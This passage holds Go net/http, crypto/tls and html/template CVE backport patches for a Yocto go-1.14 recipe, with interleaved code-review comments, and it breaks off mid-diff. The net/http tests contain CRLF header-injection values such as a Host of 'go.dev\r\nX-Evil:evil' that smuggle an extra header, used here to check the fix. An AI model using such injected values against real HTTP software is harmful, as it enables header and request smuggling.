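Review bot: The `Upstream-Status:`, `CVE:` and `Signed-off-by:` trailers in this patch sit below the `---` separator, as they do in CVE-2023-29405-1.patch, whereas the other patches in view have them above it. Text after `---` is not part of the commit message, so these lines would be dropped if the patch were ever round-tripped through `git am` and `git format-patch`, and the CVE tag would then survive only in the file name. I would move the three lines above the `---` line in both files.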
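--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
@@ -0,0 +1,212 @@
+From 5fa6923b1ea891400153d04ddf1545e23b40041b Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 28 Jun 2023 13:20:08 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: validate Host header before
+ sending
+
+Verify that the Host header we send is valid.
+Avoids surprising behavior such as a Host of "go.dev\r\nX-Evil:oops"
+adding an X-Evil header to HTTP/1 requests.
+
+Add a test, skip the test for HTTP/2. HTTP/2 is not vulnerable to
+header injection in the way HTTP/1 is, but x/net/http2 doesn't validate
+the header and will go into a retry loop when the server rejects it.
+CL 506995 adds the necessary validation to x/net/http2.
+
+Updates #60374
+Fixes #61075
+For CVE-2023-29406
+
+Change-Id: I05cb6866a9bead043101954dfded199258c6dd04
+Reviewed-on: https://go-review.googlesource.com/c/go/+/506996
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit 499458f7ca04087958987a33c2703c3ef03e27e2)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/507358
+Run-TryBot: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5fa6923b1ea891400153d04ddf1545e23b40041b]
+CVE: CVE-2023-29406
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/http_test.go | 29 ---------------------
+ src/net/http/request.go | 47 ++++++++--------------------------
+ src/net/http/request_test.go | 11 ++------
+ src/net/http/transport_test.go | 18 +++++++++++++
+ 4 files changed, 31 insertions(+), 74 deletions(-)
+
+diff --git a/src/net/http/http_test.go b/src/net/http/http_test.go
+index f4ea52d..ea38cb4 100644
+--- a/src/net/http/http_test.go
++++ b/src/net/http/http_test.go
+@@ -49,35 +49,6 @@ func TestForeachHeaderElement(t *testing.T) {
+ }
+ }
+
+-func TestCleanHost(t *testing.T) {
+- tests := []struct {
+- in, want string
+- }{
+- {"www.google.com", "www.google.com"},
+- {"www.google.com foo", "www.google.com"},
+- {"www.google.com/foo", "www.google.com"},
+- {" first character is a space", ""},
+- {"[1::6]:8080", "[1::6]:8080"},
+-
+- // Punycode:
+- {"гофер.рф/foo", "xn--c1ae0ajs.xn--p1ai"},
+- {"bücher.de", "xn--bcher-kva.de"},
+- {"bücher.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we convert to lowercase before punycode:
+- {"BÜCHER.de", "xn--bcher-kva.de"},
+- {"BÜCHER.de:8080", "xn--bcher-kva.de:8080"},
+- // Verify we normalize to NFC before punycode:
+- {"gophér.nfc", "xn--gophr-esa.nfc"}, // NFC input; no work needed
+- {"goph\u0065\u0301r.nfd", "xn--gophr-esa.nfd"}, // NFD input
+- }
+- for _, tt := range tests {
+- got := cleanHost(tt.in)
+- if tt.want != got {
+- t.Errorf("cleanHost(%q) = %q, want %q", tt.in, got, tt.want)
+- }
+- }
+-}
+-
+ // Test that cmd/go doesn't link in the HTTP server.
+ //
+ // This catches accidental dependencies between the HTTP transport and
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index cb2edd2..2706300 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -18,7 +18,6 @@ import (
+ "io/ioutil"
+ "mime"
+ "mime/multipart"
+- "net"
+ "net/http/httptrace"
+ "net/textproto"
+ "net/url"
+@@ -26,7 +25,8 @@ import (
+ "strconv"
+ "strings"
+ "sync"
+-
++
++ "golang.org/x/net/http/httpguts"
+ "golang.org/x/net/idna"
+ )
+
+@@ -557,12 +557,19 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ // is not given, use the host from the request URL.
+ //
+ // Clean the host, in case it arrives with unexpected stuff in it.
+- host := cleanHost(r.Host)
++ host := r.Host
+ if host == "" {
+ if r.URL == nil {
+ return errMissingHost
+ }
+- host = cleanHost(r.URL.Host)
++ host = r.URL.Host
++ }
++ host, err = httpguts.PunycodeHostPort(host)
++ if err != nil {
++ return err
++ }
++ if !httpguts.ValidHostHeader(host) {
++ return errors.New("http: invalid Host header")
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+@@ -717,38 +724,6 @@ func idnaASCII(v string) (string, error) {
+ return idna.Lookup.ToASCII(v)
+ }
+
+-// cleanHost cleans up the host sent in request's Host header.
+-//
+-// It both strips anything after '/' or ' ', and puts the value
+-// into Punycode form, if necessary.
+-//
+-// Ideally we'd clean the Host header according to the spec:
+-// https://tools.ietf.org/html/rfc7230#section-5.4 (Host = uri-host [ ":" port ]")
+-// https://tools.ietf.org/html/rfc7230#section-2.7 (uri-host -> rfc3986's host)
+-// https://tools.ietf.org/html/rfc3986#section-3.2.2 (definition of host)
+-// But practically, what we are trying to avoid is the situation in
+-// issue 11206, where a malformed Host header used in the proxy context
+-// would create a bad request. So it is enough to just truncate at the
+-// first offending character.
+-func cleanHost(in string) string {
+- if i := strings.IndexAny(in, " /"); i != -1 {
+- in = in[:i]
+- }
+- host, port, err := net.SplitHostPort(in)
+- if err != nil { // input was just a host
+- a, err := idnaASCII(in)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return a
+- }
+- a, err := idnaASCII(host)
+- if err != nil {
+- return in // garbage in, garbage out
+- }
+- return net.JoinHostPort(a, port)
+-}
+-
+ // removeZone removes IPv6 zone identifier from host.
+ // E.g., "[fe80::1%en0]:8080" to "[fe80::1]:8080"
+ func removeZone(host string) string {
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 461d66e..0d417ff 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -676,15 +676,8 @@ func TestRequestBadHost(t *testing.T) {
+ }
+ req.Host = "foo.com with spaces"
+ req.URL.Host = "foo.com with spaces"
+- req.Write(logWrites{t, &got})
+- want := []string{
+- "GET /after HTTP/1.1\r\n",
+- "Host: foo.com\r\n",
+- "User-Agent: " + DefaultUserAgent + "\r\n",
+- "\r\n",
+- }
+- if !reflect.DeepEqual(got, want) {
+- t.Errorf("Writes = %q\n Want = %q", got, want)
++ if err := req.Write(logWrites{t, &got}); err == nil {
++ t.Errorf("Writing request with invalid Host: succeded, want error")
+ }
+ }
+
+diff --git a/src/net/http/transport_test.go b/src/net/http/transport_test.go
+index fa0c370..0afb6b9 100644
+--- a/src/net/http/transport_test.go
++++ b/src/net/http/transport_test.go
+@@ -6249,3 +6249,21 @@ func TestIssue32441(t *testing.T) {
+ t.Error(err)
+ }
+ }
++
++func TestRequestSanitization(t *testing.T) {
++ setParallel(t)
++ defer afterTest(t)
++
++ ts := newClientServerTest(t, h1Mode, HandlerFunc(func(rw ResponseWriter, req *Request) {
++ if h, ok := req.Header["X-Evil"]; ok {
++ t.Errorf("request has X-Evil header: %q", h)
++ }
++ })).ts
++ defer ts.Close()
++ req, _ := NewRequest("GET", ts.URL, nil)
++ req.Host = "go.dev\r\nX-Evil:evil"
++ resp, _ := ts.Client().Do(req)
++ if resp != nil {
++ resp.Body.Close()
++ }
++}
+--
+2.25.1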
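Review bot: In the request.go hunk the context comment `// Clean the host, in case it arrives with unexpected stuff in it.` now sits above code that no longer cleans anything: the value is converted with `httpguts.PunycodeHostPort` and the write fails with `http: invalid Host header` when `httpguts.ValidHostHeader` rejects it. I would reword it to `// Validate the host: convert it to Punycode and refuse to write a request whose Host header is invalid.` In the same patch, TestRequestSanitization discards the errors from `NewRequest` and `Do`, so it shows only that no `X-Evil` header reaches the handler, not that the request was refused, and the error string added in request_test.go misspells "succeeded". `(*Request).write` starts and ends outside the hunk.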
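--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
@@ -0,0 +1,114 @@
+From c08a5fa413a34111c9a37fd9e545de27ab0978b1 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 19 Jul 2023 10:30:46 -0700
+Subject: [PATCH] [release-branch.go1.19] net/http: permit requests with
+ invalid Host headers
+
+Historically, the Transport has silently truncated invalid
+Host headers at the first '/' or ' ' character. CL 506996 changed
+this behavior to reject invalid Host headers entirely.
+Unfortunately, Docker appears to rely on the previous behavior.
+
+When sending a HTTP/1 request with an invalid Host, send an empty
+Host header. This is safer than truncation: If you care about the
+Host, then you should get the one you set; if you don't care,
+then an empty Host should be fine.
+
+Continue to fully validate Host headers sent to a proxy,
+since proxies generally can't productively forward requests
+without a Host.
+
+For #60374
+Fixes #61431
+Fixes #61825
+
+Change-Id: If170c7dd860aa20eb58fe32990fc93af832742b6
+Reviewed-on: https://go-review.googlesource.com/c/go/+/511155
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit b9153f6ef338baee5fe02a867c8fbc83a8b29dd1)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/518855
+Auto-Submit: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c08a5fa413a34111c9a37fd9e545de27ab0978b1]
+CVE: CVE-2023-29406
+Signed-off-by: Ming Liu <liu.ming50@gmail.com>
+---
+ src/net/http/request.go | 23 ++++++++++++++++++++++-
+ src/net/http/request_test.go | 17 ++++++++++++-----
+ 2 files changed, 34 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/request.go b/src/net/http/request.go
+index 3100037386..91cb8a66b9 100644
+--- a/src/net/http/request.go
++++ b/src/net/http/request.go
+@@ -582,8 +582,29 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
+ if err != nil {
+ return err
+ }
++ // Validate that the Host header is a valid header in general,
++ // but don't validate the host itself. This is sufficient to avoid
++ // header or request smuggling via the Host field.
++ // The server can (and will, if it's a net/http server) reject
++ // the request if it doesn't consider the host valid.
+ if !httpguts.ValidHostHeader(host) {
+- return errors.New("http: invalid Host header")
++ // Historically, we would truncate the Host header after '/' or ' '.
++ // Some users have relied on this truncation to convert a network
++ // address such as Unix domain socket path into a valid, ignored
++ // Host header (see https://go.dev/issue/61431).
++ //
++ // We don't preserve the truncation, because sending an altered
++ // header field opens a smuggling vector. Instead, zero out the
++ // Host header entirely if it isn't valid. (An empty Host is valid;
++ // see RFC 9112 Section 3.2.)
++ //
++ // Return an error if we're sending to a proxy, since the proxy
++ // probably can't do anything useful with an empty Host header.
++ if !usingProxy {
++ host = ""
++ } else {
++ return errors.New("http: invalid Host header")
++ }
+ }
+
+ // According to RFC 6874, an HTTP client, proxy, or other
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index fddc85d6a9..dd1e2dc2a1 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -770,16 +770,23 @@ func TestRequestWriteBufferedWriter(t *testing.T) {
+ }
+ }
+
+-func TestRequestBadHost(t *testing.T) {
++func TestRequestBadHostHeader(t *testing.T) {
+ got := []string{}
+ req, err := NewRequest("GET", "http://foo/after", nil)
+ if err != nil {
+ t.Fatal(err)
+ }
+- req.Host = "foo.com with spaces"
+- req.URL.Host = "foo.com with spaces"
+- if err := req.Write(logWrites{t, &got}); err == nil {
+- t.Errorf("Writing request with invalid Host: succeded, want error")
++ req.Host = "foo.com\nnewline"
++ req.URL.Host = "foo.com\nnewline"
++ req.Write(logWrites{t, &got})
++ want := []string{
++ "GET /after HTTP/1.1\r\n",
++ "Host: \r\n",
++ "User-Agent: " + DefaultUserAgent + "\r\n",
++ "\r\n",
++ }
++ if !reflect.DeepEqual(got, want) {
++ t.Errorf("Writes = %q\n Want = %q", got, want)
+ }
+ }
+
+--
+2.34.1
+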
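Review bot: Nothing in this patch exercises the `usingProxy` branch of `write`, which still returns `http: invalid Host header`; TestRequestBadHostHeader only covers the direct path where the Host is emptied. Since the patch deliberately keeps strict validation when talking to a proxy, I would pin that with a second assertion in the same test, for example `if err := req.WriteProxy(logWrites{t, &got}); err == nil { t.Errorf("WriteProxy with invalid Host succeeded, want error") }`. Without it, a later refactor could relax the proxy path and the suite would stay green. The body of `write` starts and ends outside the request.go hunk.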
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
new file mode 100644
index 0000000000..00685cc180
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
@@ -0,0 +1,175 @@
1From 2300f7ef07718f6be4d8aa8486c7de99836e233f Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Wed, 7 Jun 2023 15:27:13 -0700
4Subject: [PATCH] [release-branch.go1.19] crypto/tls: restrict RSA keys in
5 certificates to <= 8192 bits
6
7Extremely large RSA keys in certificate chains can cause a client/server
8to expend significant CPU time verifying signatures. Limit this by
9restricting the size of RSA keys transmitted during handshakes to <=
108192 bits.
11
12Based on a survey of publicly trusted RSA keys, there are currently only
13three certificates in circulation with keys larger than this, and all
14three appear to be test certificates that are not actively deployed. It
15is possible there are larger keys in use in private PKIs, but we target
16the web PKI, so causing breakage here in the interests of increasing the
17default safety of users of crypto/tls seems reasonable.
18
19Thanks to Mateusz Poliwczak for reporting this issue.
20
21Updates #61460
22Fixes #61579
23Fixes CVE-2023-29409
24
25Change-Id: Ie35038515a649199a36a12fc2c5df3af855dca6c
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1912161
27Reviewed-by: Damien Neil <dneil@google.com>
28Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
29Run-TryBot: Roland Shoemaker <bracewell@google.com>
30(cherry picked from commit d865c715d92887361e4bd5596e19e513f27781b7)
31Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1965487
32Reviewed-on: https://go-review.googlesource.com/c/go/+/514915
33Run-TryBot: David Chase <drchase@google.com>
34Reviewed-by: Matthew Dempsky <mdempsky@google.com>
35TryBot-Bypass: David Chase <drchase@google.com>
36
37Upstream-Status: Backport [https://github.com/golang/go/commit/2300f7ef07718f6be4d8aa8486c7de99836e233f]
38CVE: CVE-2023-29409
39Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
40---
41 src/crypto/tls/handshake_client.go | 8 +++
42 src/crypto/tls/handshake_client_test.go | 78 +++++++++++++++++++++++++
43 src/crypto/tls/handshake_server.go | 4 ++
44 3 files changed, 90 insertions(+)
45
46diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go
47index 4fb528c..ba33ea1 100644
48--- a/src/crypto/tls/handshake_client.go
49+++ b/src/crypto/tls/handshake_client.go
50@@ -788,6 +788,10 @@ func (hs *clientHandshakeState) sendFinished(out []byte) error {
51 return nil
52 }
53
54+// maxRSAKeySize is the maximum RSA key size in bits that we are willing
55+// to verify the signatures of during a TLS handshake.
56+const maxRSAKeySize = 8192
57+
58 // verifyServerCertificate parses and verifies the provided chain, setting
59 // c.verifiedChains and c.peerCertificates or sending the appropriate alert.
60 func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
61@@ -798,6 +802,10 @@ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
62 c.sendAlert(alertBadCertificate)
63 return errors.New("tls: failed to parse certificate from server: " + err.Error())
64 }
65+ if cert.PublicKeyAlgorithm == x509.RSA && cert.PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
66+ c.sendAlert(alertBadCertificate)
67+ return fmt.Errorf("tls: server sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
68+ }
69 certs[i] = cert
70 }
71
72diff --git a/src/crypto/tls/handshake_client_test.go b/src/crypto/tls/handshake_client_test.go
73index 6bd3c37..8d20b2b 100644
74--- a/src/crypto/tls/handshake_client_test.go
75+++ b/src/crypto/tls/handshake_client_test.go
76@@ -1984,3 +1984,81 @@ func TestCloseClientConnectionOnIdleServer(t *testing.T) {
77 t.Errorf("Error expected, but no error returned")
78 }
79 }
80+
81+// discardConn wraps a net.Conn but discards all writes, but reports that they happened.
82+type discardConn struct {
83+ net.Conn
84+}
85+
86+func (dc *discardConn) Write(data []byte) (int, error) {
87+ return len(data), nil
88+}
89+
90+// largeRSAKeyCertPEM contains a 8193 bit RSA key
91+const largeRSAKeyCertPEM = `-----BEGIN CERTIFICATE-----
92+MIIInjCCBIWgAwIBAgIBAjANBgkqhkiG9w0BAQsFADASMRAwDgYDVQQDEwd0ZXN0
93+aW5nMB4XDTIzMDYwNzIxMjMzNloXDTIzMDYwNzIzMjMzNlowEjEQMA4GA1UEAxMH
94+dGVzdGluZzCCBCIwDQYJKoZIhvcNAQEBBQADggQPADCCBAoCggQBAWdHsf6Rh2Ca
95+n2SQwn4t4OQrOjbLLdGE1pM6TBKKrHUFy62uEL8atNjlcfXIsa4aEu3xNGiqxqur
96+ZectlkZbm0FkaaQ1Wr9oikDY3KfjuaXdPdO/XC/h8AKNxlDOylyXwUSK/CuYb+1j
97+gy8yF5QFvVfwW/xwTlHmhUeSkVSQPosfQ6yXNNsmMzkd+ZPWLrfq4R+wiNtwYGu0
98+WSBcI/M9o8/vrNLnIppoiBJJ13j9CR1ToEAzOFh9wwRWLY10oZhoh1ONN1KQURx4
99+qedzvvP2DSjZbUccdvl2rBGvZpzfOiFdm1FCnxB0c72Cqx+GTHXBFf8bsa7KHky9
100+sNO1GUanbq17WoDNgwbY6H51bfShqv0CErxatwWox3we4EcAmFHPVTCYL1oWVMGo
101+a3Eth91NZj+b/nGhF9lhHKGzXSv9brmLLkfvM1jA6XhNhA7BQ5Vz67lj2j3XfXdh
102+t/BU5pBXbL4Ut4mIhT1YnKXAjX2/LF5RHQTE8Vwkx5JAEKZyUEGOReD/B+7GOrLp
103+HduMT9vZAc5aR2k9I8qq1zBAzsL69lyQNAPaDYd1BIAjUety9gAYaSQffCgAgpRO
104+Gt+DYvxS+7AT/yEd5h74MU2AH7KrAkbXOtlwupiGwhMVTstncDJWXMJqbBhyHPF8
105+3UmZH0hbL4PYmzSj9LDWQQXI2tv6vrCpfts3Cqhqxz9vRpgY7t1Wu6l/r+KxYYz3
106+1pcGpPvRmPh0DJm7cPTiXqPnZcPt+ulSaSdlxmd19OnvG5awp0fXhxryZVwuiT8G
107+VDkhyARrxYrdjlINsZJZbQjO0t8ketXAELJOnbFXXzeCOosyOHkLwsqOO96AVJA8
108+45ZVL5m95ClGy0RSrjVIkXsxTAMVG6SPAqKwk6vmTdRGuSPS4rhgckPVDHmccmuq
109+dfnT2YkX+wB2/M3oCgU+s30fAHGkbGZ0pCdNbFYFZLiH0iiMbTDl/0L/z7IdK0nH
110+GLHVE7apPraKC6xl6rPWsD2iSfrmtIPQa0+rqbIVvKP5JdfJ8J4alI+OxFw/znQe
111+V0/Rez0j22Fe119LZFFSXhRv+ZSvcq20xDwh00mzcumPWpYuCVPozA18yIhC9tNn
112+ALHndz0tDseIdy9vC71jQWy9iwri3ueN0DekMMF8JGzI1Z6BAFzgyAx3DkHtwHg7
113+B7qD0jPG5hJ5+yt323fYgJsuEAYoZ8/jzZ01pkX8bt+UsVN0DGnSGsI2ktnIIk3J
114+l+8krjmUy6EaW79nITwoOqaeHOIp8m3UkjEcoKOYrzHRKqRy+A09rY+m/cAQaafW
115+4xp0Zv7qZPLwnu0jsqB4jD8Ll9yPB02ndsoV6U5PeHzTkVhPml19jKUAwFfs7TJg
116+kXy+/xFhYVUCAwEAATANBgkqhkiG9w0BAQsFAAOCBAIAAQnZY77pMNeypfpba2WK
117+aDasT7dk2JqP0eukJCVPTN24Zca+xJNPdzuBATm/8SdZK9lddIbjSnWRsKvTnO2r
118+/rYdlPf3jM5uuJtb8+Uwwe1s+gszelGS9G/lzzq+ehWicRIq2PFcs8o3iQMfENiv
119+qILJ+xjcrvms5ZPDNahWkfRx3KCg8Q+/at2n5p7XYjMPYiLKHnDC+RE2b1qT20IZ
120+FhuK/fTWLmKbfYFNNga6GC4qcaZJ7x0pbm4SDTYp0tkhzcHzwKhidfNB5J2vNz6l
121+Ur6wiYwamFTLqcOwWo7rdvI+sSn05WQBv0QZlzFX+OAu0l7WQ7yU+noOxBhjvHds
122+14+r9qcQZg2q9kG+evopYZqYXRUNNlZKo9MRBXhfrISulFAc5lRFQIXMXnglvAu+
123+Ipz2gomEAOcOPNNVldhKAU94GAMJd/KfN0ZP7gX3YvPzuYU6XDhag5RTohXLm18w
124+5AF+ES3DOQ6ixu3DTf0D+6qrDuK+prdX8ivcdTQVNOQ+MIZeGSc6NWWOTaMGJ3lg
125+aZIxJUGdo6E7GBGiC1YTjgFKFbHzek1LRTh/LX3vbSudxwaG0HQxwsU9T4DWiMqa
126+Fkf2KteLEUA6HrR+0XlAZrhwoqAmrJ+8lCFX3V0gE9lpENfVHlFXDGyx10DpTB28
127+DdjnY3F7EPWNzwf9P3oNT69CKW3Bk6VVr3ROOJtDxVu1ioWo3TaXltQ0VOnap2Pu
128+sa5wfrpfwBDuAS9JCDg4ttNp2nW3F7tgXC6xPqw5pvGwUppEw9XNrqV8TZrxduuv
129+rQ3NyZ7KSzIpmFlD3UwV/fGfz3UQmHS6Ng1evrUID9DjfYNfRqSGIGjDfxGtYD+j
130+Z1gLJZuhjJpNtwBkKRtlNtrCWCJK2hidK/foxwD7kwAPo2I9FjpltxCRywZUs07X
131+KwXTfBR9v6ij1LV6K58hFS+8ezZyZ05CeVBFkMQdclTOSfuPxlMkQOtjp8QWDj+F
132+j/MYziT5KBkHvcbrjdRtUJIAi4N7zCsPZtjik918AK1WBNRVqPbrgq/XSEXMfuvs
133+6JbfK0B76vdBDRtJFC1JsvnIrGbUztxXzyQwFLaR/AjVJqpVlysLWzPKWVX6/+SJ
134+u1NQOl2E8P6ycyBsuGnO89p0S4F8cMRcI2X1XQsZ7/q0NBrOMaEp5T3SrWo9GiQ3
135+o2SBdbs3Y6MBPBtTu977Z/0RO63J3M5i2tjUiDfrFy7+VRLKr7qQ7JibohyB8QaR
136+9tedgjn2f+of7PnP/PEl1cCphUZeHM7QKUMPT8dbqwmKtlYY43EHXcvNOT5IBk3X
137+9lwJoZk/B2i+ZMRNSP34ztAwtxmasPt6RAWGQpWCn9qmttAHAnMfDqe7F7jVR6rS
138+u58=
139+-----END CERTIFICATE-----`
140+
141+func TestHandshakeRSATooBig(t *testing.T) {
142+ testCert, _ := pem.Decode([]byte(largeRSAKeyCertPEM))
143+
144+ c := &Conn{conn: &discardConn{}, config: testConfig.Clone()}
145+
146+ expectedErr := "tls: server sent certificate containing RSA key larger than 8192 bits"
147+ err := c.verifyServerCertificate([][]byte{testCert.Bytes})
148+ if err == nil || err.Error() != expectedErr {
149+ t.Errorf("Conn.verifyServerCertificate unexpected error: want %q, got %q", expectedErr, err)
150+ }
151+
152+ expectedErr = "tls: client sent certificate containing RSA key larger than 8192 bits"
153+ err = c.processCertsFromClient(Certificate{Certificate: [][]byte{testCert.Bytes}})
154+ if err == nil || err.Error() != expectedErr {
155+ t.Errorf("Conn.processCertsFromClient unexpected error: want %q, got %q", expectedErr, err)
156+ }
157+}
158diff --git a/src/crypto/tls/handshake_server.go b/src/crypto/tls/handshake_server.go
159index b16415a..2e36840 100644
160--- a/src/crypto/tls/handshake_server.go
161+++ b/src/crypto/tls/handshake_server.go
162@@ -738,6 +738,10 @@ func (c *Conn) processCertsFromClient(certificate Certificate) error {
163 c.sendAlert(alertBadCertificate)
164 return errors.New("tls: failed to parse client certificate: " + err.Error())
165 }
166+ if certs[i].PublicKeyAlgorithm == x509.RSA && certs[i].PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
167+ c.sendAlert(alertBadCertificate)
168+ return fmt.Errorf("tls: client sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
169+ }
170 }
171
172 if len(certs) == 0 && requiresClientCert(c.config.ClientAuth) {
173--
1742.25.1
175
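Review bot: The new size check in verifyServerCertificate, and its twin in processCertsFromClient, uses an unchecked assertion, `cert.PublicKey.(*rsa.PublicKey)`, so it relies on the parser always pairing `x509.RSA` with that concrete type and would panic instead of failing the handshake if that ever did not hold. I would use the comma-ok form, `pub, ok := cert.PublicKey.(*rsa.PublicKey)`, and reject on `!ok || pub.N.BitLen() > maxRSAKeySize` so the check fails closed with `alertBadCertificate`. In TestHandshakeRSATooBig the result of `pem.Decode` is dereferenced without a nil check, so a damaged PEM constant would show up as a panic rather than a test failure; `if testCert == nil { t.Fatal("failed to decode largeRSAKeyCertPEM") }` avoids that. Both handshake functions continue outside their hunks.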
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
new file mode 100644
index 0000000000..00def8fcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
@@ -0,0 +1,262 @@
1From 023b542edf38e2a1f87fcefb9f75ff2f99401b4c Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 3 Aug 2023 12:24:13 -0700
4Subject: [PATCH] [release-branch.go1.20] html/template: support HTML-like
5 comments in script contexts
6
7Per Appendix B.1.1 of the ECMAScript specification, support HTML-like
8comments in script contexts. Also per section 12.5, support hashbang
9comments. This brings our parsing in-line with how browsers treat these
10comment types.
11
12Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
13reporting this issue.
14
15Fixes #62196
16Fixes #62395
17Fixes CVE-2023-39318
18
19Change-Id: Id512702c5de3ae46cf648e268cb10e1eb392a181
20Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976593
21Run-TryBot: Roland Shoemaker <bracewell@google.com>
22Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
23Reviewed-by: Damien Neil <dneil@google.com>
24Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
25Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014620
26Reviewed-on: https://go-review.googlesource.com/c/go/+/526098
27Run-TryBot: Cherry Mui <cherryyz@google.com>
28TryBot-Result: Gopher Robot <gobot@golang.org>
29
30Upstream-Status: Backport from [https://github.com/golang/go/commit/023b542edf38e2a1f87fcefb9f75ff2f99401b4c]
31CVE: CVE-2023-39318
32Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
33---
34 src/html/template/context.go | 6 ++-
35 src/html/template/escape.go | 5 +-
36 src/html/template/escape_test.go | 10 ++++
37 src/html/template/state_string.go | 26 +++++-----
38 src/html/template/transition.go | 80 ++++++++++++++++++++-----------
39 5 files changed, 84 insertions(+), 43 deletions(-)
40
41diff --git a/src/html/template/context.go b/src/html/template/context.go
42index 0b65313..4eb7891 100644
43--- a/src/html/template/context.go
44+++ b/src/html/template/context.go
45@@ -124,6 +124,10 @@ const (
46 stateJSBlockCmt
47 // stateJSLineCmt occurs inside a JavaScript // line comment.
48 stateJSLineCmt
49+ // stateJSHTMLOpenCmt occurs inside a JavaScript <!-- HTML-like comment.
50+ stateJSHTMLOpenCmt
51+ // stateJSHTMLCloseCmt occurs inside a JavaScript --> HTML-like comment.
52+ stateJSHTMLCloseCmt
53 // stateCSS occurs inside a <style> element or style attribute.
54 stateCSS
55 // stateCSSDqStr occurs inside a CSS double quoted string.
56@@ -149,7 +153,7 @@ const (
57 // authors & maintainers, not for end-users or machines.
58 func isComment(s state) bool {
59 switch s {
60- case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateCSSBlockCmt, stateCSSLineCmt:
61+ case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt, stateCSSBlockCmt, stateCSSLineCmt:
62 return true
63 }
64 return false
65diff --git a/src/html/template/escape.go b/src/html/template/escape.go
66index 435f912..ad2ec69 100644
67--- a/src/html/template/escape.go
68+++ b/src/html/template/escape.go
69@@ -698,9 +698,12 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
70 if c.state != c1.state && isComment(c1.state) && c1.delim == delimNone {
71 // Preserve the portion between written and the comment start.
72 cs := i1 - 2
73- if c1.state == stateHTMLCmt {
74+ if c1.state == stateHTMLCmt || c1.state == stateJSHTMLOpenCmt {
75 // "<!--" instead of "/*" or "//"
76 cs -= 2
77+ } else if c1.state == stateJSHTMLCloseCmt {
78+ // "-->" instead of "/*" or "//"
79+ cs -= 1
80 }
81 b.Write(s[written:cs])
82 written = i1
83diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
84index f550691..5f41e52 100644
85--- a/src/html/template/escape_test.go
86+++ b/src/html/template/escape_test.go
87@@ -503,6 +503,16 @@ func TestEscape(t *testing.T) {
88 "<script>var a/*b*///c\nd</script>",
89 "<script>var a \nd</script>",
90 },
91+ {
92+ "JS HTML-like comments",
93+ "<script>before <!-- beep\nbetween\nbefore-->boop\n</script>",
94+ "<script>before \nbetween\nbefore\n</script>",
95+ },
96+ {
97+ "JS hashbang comment",
98+ "<script>#! beep\n</script>",
99+ "<script>\n</script>",
100+ },
101 {
102 "CSS comments",
103 "<style>p// paragraph\n" +
104diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
105index 05104be..b5cfe70 100644
106--- a/src/html/template/state_string.go
107+++ b/src/html/template/state_string.go
